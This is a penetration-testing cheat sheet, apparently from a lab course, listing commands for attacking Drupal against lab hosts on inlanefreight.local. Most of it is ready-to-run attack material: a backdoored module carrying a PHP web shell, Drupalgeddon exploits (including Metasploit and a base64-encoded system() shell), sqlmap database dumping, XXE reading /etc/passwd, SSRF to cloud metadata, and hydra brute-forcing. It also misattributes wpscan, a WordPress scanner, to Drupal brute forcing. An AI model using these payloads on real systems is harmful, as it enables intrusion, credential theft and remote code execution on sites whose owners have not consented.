6.-Attacking-drupal

1. PHP Filter Module Exploitation (Drupal < 8)

curl -s http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id

  • Enable PHP filter module, inject code via content.

  • Consideration: Client communication before enabling modules.

2. Backdoored Module Upload

wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
echo '<?php system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);?>' > captcha/shell.php
echo '<IfModule mod_rewrite.c>RewriteEngine On;RewriteBase /</IfModule>' > captcha/.htaccess
tar cvf captcha.tar.gz captcha/captcha/
curl -s drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id

  • Upload malicious module via admin panel.

  • Consideration: Avoid modifying production systems without explicit permission.

3. Drupalgeddon (CVE-2014-3704)

python2.7 drupalgeddon.py -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd

  • Create admin user via SQL injection.

  • Consideration: Impact of creating unauthorized admin accounts.

4. Drupalgeddon2 (CVE-2018-7600)

python3 drupalgeddon2.py
echo "PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K" | base64 -d | tee mrb3n.php
curl http://drupal-dev.inlanefreight.local/mrb3n.php?fe8edbabc5c5c9b7b764504cd22b17af=id

  • RCE via user registration form.

  • Consideration: Severity of unauthenticated RCE vulnerabilities.

5. Drupalgeddon3 (CVE-2018-7602)

msf6 > use exploit/multi/http/drupal_drupageddon3
msf6 > set rhosts 10.129.42.195
msf6 > set VHOST drupal-acc.inlanefreight.local
msf6 > set drupal_session SESS...
msf6 > set DRUPAL_NODE 1
msf6 > set LHOST 10.10.14.15
msf6 > exploit

  • RCE via Form API (requires authenticated session).

  • Consideration: Session hijacking risks.

6. Drupal Configuration File Exploitation/Security

curl -s http://drupal.inlanefreight.local/sites/default/settings.php
ls -l sites/default/settings.php
cat .htaccess

  • Check for exposed settings.php, extract database credentials.

  • Consideration: Secure configuration file permissions and access.

7. Database Exploitation (SQL Injection - Expanded)

curl "http://drupal.inlanefreight.local/node/1?id=1'--"
curl "http://drupal.inlanefreight.local/node/1?id=1' OR '1'='1"
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --dbs --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] --tables --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] --columns --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] -C [column1,column2] --dump --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --level 5 --risk 3

  • Manual and automated SQL injection testing.

  • Consideration: Validate findings with alternative tools.

8. Form API Exploitation

curl -X POST -d "param1=value1&param2=payload" http://drupal.inlanefreight.local/form_path

  • Consideration: Burp Suite is very helpful for deeper analysis.

9. File Upload Vulnerabilities

curl -F "file=@malicious.php" http://drupal.inlanefreight.local/upload_path

  • Test various file extensions.

  • Consideration: Look for MIME type enforcement.

10. Access Control Vulnerabilities

curl -I http://drupal.inlanefreight.local/admin

  • Check for 200 response when not authenticated.

  • Consideration: Test different user roles.

11. Session Management Vulnerabilities

  • Use Burp Suite's Sequencer and Session handling rules.

12. XML External Entity (XXE) Injection

curl -X POST -H "Content-Type: application/xml" -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>' http://drupal.inlanefreight.local/xml_endpoint

13. Server-Side Request Forgery (SSRF)

curl "http://drupal.inlanefreight.local/page?url=http://169.254.169.254/latest/meta-data/"

  • Consideration: Check response for internal metadata leaks.

14. Drupal Brute Forcing

wpscan --url http://drupal.inlanefreight.local/ --enumerate u --passwords /usr/share/wordlists/rockyou.txt
hydra -l admin -P /usr/share/wordlists/rockyou.txt drupal.inlanefreight.local http-post-form "/user/login:name=^USER^&pass=^PASS^&form_id=user_login:Invalid username or password"

  • Consideration: Use specific tools for Drupal authentication mechanisms.

Additional Notes:

  • Ensure Drupal versions are known before testing specific exploits.

  • Use enumeration tools like droopescan for discovering modules and themes.

  • Test patches and mitigations post-exploitation to ensure security fixes.

Previous5.-Drupal-discovery-and-enumerationNext2. Servlet Containers and Software Development

Last updated